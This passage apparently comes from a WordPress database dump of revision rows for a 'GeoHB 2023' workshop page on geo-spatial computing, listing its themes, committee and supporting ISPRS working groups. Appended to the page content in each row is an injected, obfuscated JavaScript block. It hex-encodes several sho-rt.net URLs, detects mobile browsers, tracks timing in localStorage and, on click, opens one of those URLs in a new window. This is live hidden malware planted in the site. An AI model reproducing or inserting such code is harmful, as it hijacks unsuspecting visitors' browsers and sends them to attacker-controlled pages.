_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-01-07 13:57:05','2023-01-07 13:57:05','',2791,'https://gsw2023.com/?p=3530',0,'revision','',0),
(3531,1,'2023-01-07 13:57:49','2023-01-07 13:57:49','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5></h5>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<h5></h5>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<p>&nbsp;</p>\n<h5></h5>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-01-07 13:57:49','2023-01-07 13:57:49','',2791,'https://gsw2023.com/?p=3531',0,'revision','',0),
(3532,1,'2023-01-07 13:58:30','2023-01-07 13:58:30','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<p>&nbsp;</p>\n<h5></h5>\n<h5></h5>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 